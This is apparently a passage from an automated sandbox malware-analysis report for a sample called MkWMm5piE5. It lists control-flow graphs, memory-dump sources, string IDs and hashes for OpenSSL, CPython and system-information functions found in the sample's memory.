                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debugR_set_error$O_mallocstrncmp
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_ciph.c$ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$ssl_create_cipher_list
                                                                                                                                                                                                                                                                          • API String ID: 3221604530-3764566645
                                                                                                                                                                                                                                                                          • Opcode ID: 14785ce5d972bfe2a49a4b4ab6a3e7526e024d3576ae33f82c755a10b848aa43
                                                                                                                                                                                                                                                                          • Instruction ID: 4923721a0522cdd3b32c97ea51d436ee518c1a84f504a2892f81a45fac0a6fa7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14785ce5d972bfe2a49a4b4ab6a3e7526e024d3576ae33f82c755a10b848aa43
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF826BB2A48B4689DAA8CF49985067D33A1FB14BC4F1C8137DE4CA7B65DE3DD942C740

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 760 7ffedcbb1490-7ffedcbb14c2 GetSystemInfo 761 7ffedcbb14c8-7ffedcbb14d9 760->761 762 7ffedcbb14c4-7ffedcbb14c6 760->762 763 7ffedcbb14e4-7ffedcbb14f5 761->763 767 7ffedcbb14db 761->767 762->763 765 7ffedcbb14f7-7ffedcbb14fe 763->765 766 7ffedcbb1500-7ffedcbb1503 763->766 768 7ffedcbb1535-7ffedcbb1546 765->768 766->768 769 7ffedcbb1505-7ffedcbb150d 766->769 767->763 770 7ffedcbb1558-7ffedcbb155f 768->770 771 7ffedcbb1548-7ffedcbb1551 768->771 772 7ffedcbb150f 769->772 773 7ffedcbb1524-7ffedcbb1528 769->773 775 7ffedcbb1561-7ffedcbb1563 770->775 776 7ffedcbb1565-7ffedcbb1576 770->776 771->770 777 7ffedcbb1513-7ffedcbb1516 772->777 773->768 774 7ffedcbb152a-7ffedcbb1531 773->774 774->768 780 7ffedcbb1588-7ffedcbb1592 775->780 787 7ffedcbb1578 776->787 788 7ffedcbb1581 776->788 777->773 778 7ffedcbb1518-7ffedcbb1522 777->778 778->773 778->777 781 7ffedcbb15a4-7ffedcbb15a7 780->781 782 7ffedcbb1594-7ffedcbb15a2 780->782 785 7ffedcbb15a9-7ffedcbb15b1 781->785 786 7ffedcbb15ef-7ffedcbb15f9 781->786 784 7ffedcbb15d9-7ffedcbb15dc 782->784 784->786 791 7ffedcbb15de-7ffedcbb15ed 784->791 789 7ffedcbb15c8-7ffedcbb15cc 785->789 790 7ffedcbb15b3 785->790 792 7ffedcbb1600-7ffedcbb1603 786->792 787->788 788->780 789->784 794 7ffedcbb15ce-7ffedcbb15d5 789->794 793 7ffedcbb15b7-7ffedcbb15ba 790->793 791->792 795 7ffedcbb1615-7ffedcbb161c 792->795 796 7ffedcbb1605-7ffedcbb160e 792->796 793->789 799 7ffedcbb15bc-7ffedcbb15c6 793->799 794->784 797 7ffedcbb161e-7ffedcbb1620 795->797 798 7ffedcbb1622-7ffedcbb1633 795->798 796->795 800 7ffedcbb1645-7ffedcbb164f 797->800 805 7ffedcbb163e 798->805 806 7ffedcbb1635 798->806 799->789 799->793 803 7ffedcbb1661-7ffedcbb1664 800->803 804 7ffedcbb1651-7ffedcbb165f 800->804 808 7ffedcbb1666-7ffedcbb166e 803->808 809 7ffedcbb16ac-7ffedcbb16b6 803->809 807 7ffedcbb1696-7ffedcbb1699 804->807 805->800 806->805 807->809 810 7ffedcbb169b-7ffedcbb16aa 807->810 812 7ffedcbb1670 808->812 813 7ffedcbb1685-7ffedcbb1689 808->813 811 7ffedcbb16bd-7ffedcbb16c0 809->811 810->811 814 7ffedcbb16d2-7ffedcbb16d9 811->814 815 7ffedcbb16c2-7ffedcbb16cb 811->815 816 7ffedcbb1674-7ffedcbb1677 812->816 813->807 817 7ffedcbb168b-7ffedcbb1692 813->817 818 7ffedcbb16db-7ffedcbb16dd 814->818 819 7ffedcbb16df-7ffedcbb16f0 814->819 815->814 816->813 820 7ffedcbb1679-7ffedcbb1683 816->820 817->807 822 7ffedcbb1702-7ffedcbb170c 818->822 829 7ffedcbb16fb 819->829 830 7ffedcbb16f2 819->830 820->813 820->816 823 7ffedcbb171e-7ffedcbb1721 822->823 824 7ffedcbb170e-7ffedcbb171c 822->824 827 7ffedcbb1769-7ffedcbb1770 823->827 828 7ffedcbb1723-7ffedcbb172b 823->828 826 7ffedcbb1753-7ffedcbb1756 824->826 826->827 833 7ffedcbb1758-7ffedcbb1767 826->833 834 7ffedcbb1777-7ffedcbb177a 827->834 831 7ffedcbb172d 828->831 832 7ffedcbb1742-7ffedcbb1746 828->832 829->822 830->829 835 7ffedcbb1731-7ffedcbb1734 831->835 832->826 836 7ffedcbb1748-7ffedcbb174f 832->836 833->834 837 7ffedcbb177c 834->837 838 7ffedcbb1785-7ffedcbb178c 834->838 835->832 839 7ffedcbb1736-7ffedcbb1740 835->839 836->826 837->838 840 7ffedcbb17a1-7ffedcbb17ba 838->840 841 7ffedcbb178e-7ffedcbb17a0 838->841 839->832 839->835
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596106431.00007FFEDCBA1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFEDCBA0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596079579.00007FFEDCBA0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596266920.00007FFEDCCFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596342688.00007FFEDCCFF000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcba0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 31276548-0
                                                                                                                                                                                                                                                                          • Opcode ID: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
                                                                                                                                                                                                                                                                          • Instruction ID: e4876a044b345a1714fa739d2c9139288769ec99333ee6413d37327c56d5c7aa
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92d82e4b214818c158f58746d604a038a40c5e57c576eefab9a689c2dc8594a3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1EC64A8BB1781EE648F49A51437C2292BF59BC4F1C293BCA0E47BB0DF6CE457C241

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 344 7ffedd954640-7ffedd95467d PyImport_ImportModuleLevelObject 345 7ffedd954683-7ffedd95468f 344->345 346 7ffedd9547fb 344->346 348 7ffedd954815-7ffedd954818 345->348 349 7ffedd954695-7ffedd9546a8 345->349 347 7ffedd9547fd-7ffedd954814 346->347 348->347 350 7ffedd9546b0-7ffedd9546c9 PyObject_GetAttr 349->350 351 7ffedd9546cb-7ffedd9546e9 PyUnicode_FromFormat 350->351 352 7ffedd954717-7ffedd95472b 350->352 353 7ffedd9546ef-7ffedd954701 PyObject_GetItem 351->353 354 7ffedd95477b-7ffedd9547c2 PyErr_Clear PyModule_GetFilenameObject PyUnicode_FromFormat PyErr_SetImportError 351->354 355 7ffedd954735 PyObject_SetItem 352->355 356 7ffedd95472d-7ffedd954733 PyDict_SetItem 352->356 360 7ffedd954712-7ffedd954715 353->360 361 7ffedd954703-7ffedd954707 353->361 358 7ffedd9547d3-7ffedd9547d6 354->358 359 7ffedd9547c4-7ffedd9547c8 354->359 357 7ffedd95473b-7ffedd954740 355->357 356->357 362 7ffedd954742-7ffedd954746 357->362 363 7ffedd954751-7ffedd954753 357->363 365 7ffedd9547e7-7ffedd9547ea 358->365 366 7ffedd9547d8-7ffedd9547dc 358->366 359->358 364 7ffedd9547ca-7ffedd9547cd _Py_Dealloc 359->364 360->352 360->354 361->360 367 7ffedd954709-7ffedd95470c _Py_Dealloc 361->367 362->363 368 7ffedd954748-7ffedd95474b _Py_Dealloc 362->368 363->365 369 7ffedd954759-7ffedd954768 363->369 364->358 365->346 371 7ffedd9547ec-7ffedd9547f0 365->371 366->365 370 7ffedd9547de-7ffedd9547e1 _Py_Dealloc 366->370 367->360 368->363 369->348 372 7ffedd95476e-7ffedd954776 369->372 370->365 371->346 373 7ffedd9547f2-7ffedd9547f5 _Py_Dealloc 371->373 372->350 373->346
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$ItemObject_$Err_FormatFromImportObjectUnicode_$AttrClearDict_ErrorFilenameImport_LevelModuleModule_
                                                                                                                                                                                                                                                                          • String ID: %U.%U$cannot import name %R from %R (%S)
                                                                                                                                                                                                                                                                          • API String ID: 3630264407-438398067
                                                                                                                                                                                                                                                                          • Opcode ID: fcd6dac6a765cb05053f4bfe7cd39cb166bae5586e68d4d28e2f2c7c25a5bf2f
                                                                                                                                                                                                                                                                          • Instruction ID: bb3219aaea2da4ebc9b7aafb72e43f86792fb5fd833fdb951107d2ac2e2f9f8d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fcd6dac6a765cb05053f4bfe7cd39cb166bae5586e68d4d28e2f2c7c25a5bf2f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61512036A08A4281EAA49F11A84866D63A4FB45FD9F4C4032CE4D47F74FFBEE455C700

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug$L_sk_valueR_clear_errorX509_get0_pubkey
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_clnt.c$tls_post_process_server_certificate
                                                                                                                                                                                                                                                                          • API String ID: 2779586248-3767186838
                                                                                                                                                                                                                                                                          • Opcode ID: 0af73a7ef5c1ae26b5794daadae99318289736140e87730d2df3c966b77d2711
                                                                                                                                                                                                                                                                          • Instruction ID: 2f898296968dd09f8b7d858e115a97f89740b50680aba077ad491d7775393644
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0af73a7ef5c1ae26b5794daadae99318289736140e87730d2df3c966b77d2711
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9151A0A1A4968281FB509B19D8453BD2390EB84BC4F5C5033DE0DA7FB6DE2DE983C741

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 415 7ffedce8e8a0-7ffedce8e8d1 call 7ffedce3132a 418 7ffedce8e8e1-7ffedce8e939 415->418 419 7ffedce8e8d3-7ffedce8e8da 415->419 420 7ffedce8e948-7ffedce8e94c 418->420 421 7ffedce8e93b-7ffedce8e945 418->421 419->418 422 7ffedce8e950-7ffedce8e955 420->422 421->420 423 7ffedce8e957-7ffedce8e95a 422->423 424 7ffedce8e994-7ffedce8e9aa 422->424 425 7ffedce8e960-7ffedce8e963 423->425 426 7ffedce8ea74-7ffedce8ea8a 423->426 427 7ffedce8e9ac-7ffedce8e9b1 call 7ffedce326bc 424->427 428 7ffedce8e9b3 call 7ffedce32261 424->428 431 7ffedce8e969-7ffedce8e96f call 7ffedce31c67 425->431 432 7ffedce8eb60-7ffedce8eb65 ERR_new 425->432 429 7ffedce8ea8c-7ffedce8ea91 call 7ffedce315dc 426->429 430 7ffedce8ea93 call 7ffedce311cc 426->430 439 7ffedce8e9b8-7ffedce8e9ba 427->439 428->439 443 7ffedce8ea98-7ffedce8ea9a 429->443 430->443 442 7ffedce8e972-7ffedce8e978 431->442 435 7ffedce8eb6a-7ffedce8eb88 ERR_set_debug 432->435 440 7ffedce8ec26-7ffedce8ec2c call 7ffedce31d93 435->440 444 7ffedce8e9c0-7ffedce8e9c3 439->444 445 7ffedce8ec31 439->445 440->445 442->420 448 7ffedce8e97a-7ffedce8e98a 442->448 443->445 449 7ffedce8eaa0-7ffedce8eab8 443->449 446 7ffedce8e9e1-7ffedce8e9ed 444->446 447 7ffedce8e9c5-7ffedce8e9d7 444->447 451 7ffedce8ec33-7ffedce8ec4a 445->451 446->445 457 7ffedce8e9f3-7ffedce8ea03 446->457 452 7ffedce8e9d9 447->452 453 7ffedce8e9de 447->453 448->424 454 7ffedce8eabe-7ffedce8eae4 449->454 455 7ffedce8ebf1-7ffedce8ebfb ERR_new 449->455 452->453 453->446 459 7ffedce8ebd6-7ffedce8ebda 454->459 460 7ffedce8eaea-7ffedce8eaed 454->460 455->435 469 7ffedce8ea09-7ffedce8ea17 457->469 470 7ffedce8ec00-7ffedce8ec22 ERR_new ERR_set_debug 457->470 461 7ffedce8ebdc-7ffedce8ebe0 459->461 462 7ffedce8ebe2-7ffedce8ebec ERR_set_debug ERR_new 459->462 464 7ffedce8ebb7-7ffedce8ebc5 460->464 465 7ffedce8eaf3-7ffedce8eaf6 460->465 461->445 461->462 462->440 466 7ffedce8ebc7-7ffedce8ebca call 7ffedce3254f 464->466 467 7ffedce8ebcf-7ffedce8ebd4 464->467 471 7ffedce8eaf8-7ffedce8eafb 465->471 472 7ffedce8eb00-7ffedce8eb0e 465->472 466->467 467->451 474 7ffedce8ea19-7ffedce8ea1c 469->474 475 7ffedce8ea65-7ffedce8ea6d 469->475 470->440 471->422 472->422 474->475 476 7ffedce8ea1e-7ffedce8ea3f BUF_MEM_grow_clean 474->476 475->426 477 7ffedce8eb8d-7ffedce8ebb5 ERR_new ERR_set_debug 476->477 478 7ffedce8ea45-7ffedce8ea48 476->478 477->440 478->477 479 7ffedce8ea4e-7ffedce8ea63 478->479 479->475
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem.c$read_state_machine
                                                                                                                                                                                                                                                                          • API String ID: 0-3323778802
                                                                                                                                                                                                                                                                          • Opcode ID: 0cbcb5b6c793e1bbefcd49de564b430dfaeb91769893d2f93480b62aa1a8f3cc
                                                                                                                                                                                                                                                                          • Instruction ID: ce1d3bc6aea0c39e42800dd4ec2cbf7311c7b72e055a903681442603fffea289
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cbcb5b6c793e1bbefcd49de564b430dfaeb91769893d2f93480b62aa1a8f3cc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF916AA6A48A8685EB649B19D8403BD3750EF81BC8F5C403BDE4D6BEA5CE3DE447C700

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 481 7ffedce314ec-7ffedce77d64 call 7ffedce3132a 485 7ffedce77e24 481->485 486 7ffedce77d6a-7ffedce77d72 481->486 487 7ffedce77e26-7ffedce77e42 485->487 488 7ffedce77d74-7ffedce77d7b call 7ffedce31852 486->488 489 7ffedce77d81-7ffedce77da1 486->489 488->489 501 7ffedce77ebe-7ffedce77ec3 488->501 491 7ffedce77da3-7ffedce77da6 489->491 492 7ffedce77dcb-7ffedce77de0 489->492 496 7ffedce77daf-7ffedce77dc4 491->496 497 7ffedce77da8 491->497 493 7ffedce77de2-7ffedce77de7 492->493 494 7ffedce77e07-7ffedce77e18 492->494 493->494 498 7ffedce77de9-7ffedce77e00 memmove 493->498 499 7ffedce77e4d-7ffedce77e50 494->499 500 7ffedce77e1a-7ffedce77e1d 494->500 496->492 497->496 498->494 504 7ffedce77e52-7ffedce77e77 499->504 505 7ffedce77e79-7ffedce77e8a 499->505 502 7ffedce77e43-7ffedce77e46 500->502 503 7ffedce77e1f-7ffedce77e22 500->503 501->487 502->504 506 7ffedce77e48-7ffedce77e4b 502->506 503->485 503->499 504->487 507 7ffedce77e8c-7ffedce77eb9 ERR_new ERR_set_debug call 7ffedce31d93 505->507 508 7ffedce77ec8-7ffedce77ecf 505->508 506->504 507->501 509 7ffedce77ed1-7ffedce77ed3 508->509 510 7ffedce77eda-7ffedce77edd 508->510 509->510 512 7ffedce77ed5-7ffedce77ed8 509->512 513 7ffedce77ee4-7ffedce77eeb 510->513 514 7ffedce77edf-7ffedce77ee2 510->514 515 7ffedce77ef0-7ffedce77f02 SetLastError 512->515 513->515 514->515 516 7ffedce77f08-7ffedce77f26 BIO_read 515->516 517 7ffedce78007-7ffedce78039 ERR_new ERR_set_debug call 7ffedce31d93 515->517 518 7ffedce77f2b 516->518 519 7ffedce77f28 516->519 527 7ffedce7803e-7ffedce7804c 517->527 521 7ffedce77f81-7ffedce77f91 call 7ffedceace3d 518->521 522 7ffedce77f2d-7ffedce77f3f 518->522 519->518 521->527 535 7ffedce77f97-7ffedce77fab BIO_ctrl 521->535 525 7ffedce77f41-7ffedce77f44 522->525 526 7ffedce77f46-7ffedce77f49 522->526 525->526 531 7ffedce77f4d 525->531 526->515 532 7ffedce77f4b 526->532 528 7ffedce78070-7ffedce78072 527->528 529 7ffedce7804e-7ffedce7805d 527->529 528->487 529->528 534 7ffedce7805f-7ffedce78066 529->534 533 7ffedce77f50-7ffedce77f7c 531->533 532->533 533->487 534->528 536 7ffedce78068-7ffedce7806b call 7ffedce31988 534->536 535->527 537 7ffedce77fb1-7ffedce77fb8 535->537 536->528 539 7ffedce77fd3-7ffedce78000 ERR_new ERR_set_debug call 7ffedce31d93 537->539 540 7ffedce77fba-7ffedce77fd1 call 7ffedce31c49 537->540 544 7ffedce78005 539->544 540->527 544->527
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: R_newR_set_debug$ErrorLastO_ctrlO_readmemmove
                                                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
                                                                                                                                                                                                                                                                          • API String ID: 4133841363-4226281315
                                                                                                                                                                                                                                                                          • Opcode ID: 2268ad3eb59b56abb725691c661db9ec57946eca3ed3c16763945f0c43adafd2
                                                                                                                                                                                                                                                                          • Instruction ID: a2ead79cde90371487213de0046d01bd735a91c24dc377cc88648ed816789499
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2268ad3eb59b56abb725691c661db9ec57946eca3ed3c16763945f0c43adafd2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B919EB1A4865282FB519F29D9047BD2290EB40BC8F58523BDE4C67EE4DF78E887C700

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 545 7ffedd958ec3-7ffedd958f09 call 7ffedd9541e0 548 7ffedd958f43-7ffedd958f4d 545->548 549 7ffedd958f0b-7ffedd958f15 call 7ffedd9623a0 545->549 550 7ffedd958f4f-7ffedd958f58 548->550 551 7ffedd958f69-7ffedd958f6c 548->551 556 7ffedd958f1a-7ffedd958f1c 549->556 550->551 553 7ffedd958f5a-7ffedd958f5e 550->553 554 7ffedd958f6e-7ffedd958f70 551->554 555 7ffedd958f81-7ffedd958f8b 551->555 553->551 557 7ffedd958f60-7ffedd958f63 _Py_Dealloc 553->557 554->555 558 7ffedd958f72-7ffedd958f76 554->558 559 7ffedd958fa4-7ffedd958fae 555->559 560 7ffedd958f8d-7ffedd958f96 555->560 556->548 561 7ffedd958f1e-7ffedd958f20 556->561 557->551 558->555 562 7ffedd958f78-7ffedd958f7b _Py_Dealloc 558->562 564 7ffedd958fb0-7ffedd958fb9 559->564 565 7ffedd958fc7-7ffedd958fd1 559->565 560->559 563 7ffedd958f98-7ffedd958f9c 560->563 566 7ffedd958f22-7ffedd958f26 561->566 567 7ffedd958f31-7ffedd958f42 561->567 562->555 563->559 570 7ffedd958f9e _Py_Dealloc 563->570 564->565 571 7ffedd958fbb-7ffedd958fbf 564->571 568 7ffedd958fd3-7ffedd958fdc 565->568 569 7ffedd958fea-7ffedd958ff4 565->569 566->567 572 7ffedd958f28-7ffedd958f2b _Py_Dealloc 566->572 568->569 573 7ffedd958fde-7ffedd958fe2 568->573 574 7ffedd95900d-7ffedd959017 569->574 575 7ffedd958ff6-7ffedd958fff 569->575 570->559 571->565 576 7ffedd958fc1 _Py_Dealloc 571->576 572->567 573->569 577 7ffedd958fe4 _Py_Dealloc 573->577 579 7ffedd959030-7ffedd95903a 574->579 580 7ffedd959019-7ffedd959022 574->580 575->574 578 7ffedd959001-7ffedd959005 575->578 576->565 577->569 578->574 581 7ffedd959007 _Py_Dealloc 578->581 583 7ffedd959053-7ffedd95905d 579->583 584 7ffedd95903c-7ffedd959045 579->584 580->579 582 7ffedd959024-7ffedd959028 580->582 581->574 582->579 587 7ffedd95902a _Py_Dealloc 582->587 585 7ffedd95905f-7ffedd959068 583->585 586 7ffedd959076-7ffedd959080 583->586 584->583 588 7ffedd959047-7ffedd95904b 584->588 585->586 589 7ffedd95906a-7ffedd95906e 585->589 590 7ffedd959082-7ffedd95908b 586->590 591 7ffedd959099-7ffedd9590a3 586->591 587->579 588->583 592 7ffedd95904d _Py_Dealloc 588->592 589->586 593 7ffedd959070 _Py_Dealloc 589->593 590->591 594 7ffedd95908d-7ffedd959091 590->594 595 7ffedd9590a5-7ffedd9590ae 591->595 596 7ffedd9590bc-7ffedd9590c6 591->596 592->583 593->586 594->591 597 7ffedd959093 _Py_Dealloc 594->597 595->596 598 7ffedd9590b0-7ffedd9590b4 595->598 599 7ffedd9590df-7ffedd9590eb 596->599 600 7ffedd9590c8-7ffedd9590d1 596->600 597->591 598->596 601 7ffedd9590b6 _Py_Dealloc 598->601 600->599 602 7ffedd9590d3-7ffedd9590d7 600->602 601->596 602->599 603 7ffedd9590d9 _Py_Dealloc 602->603 603->599
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
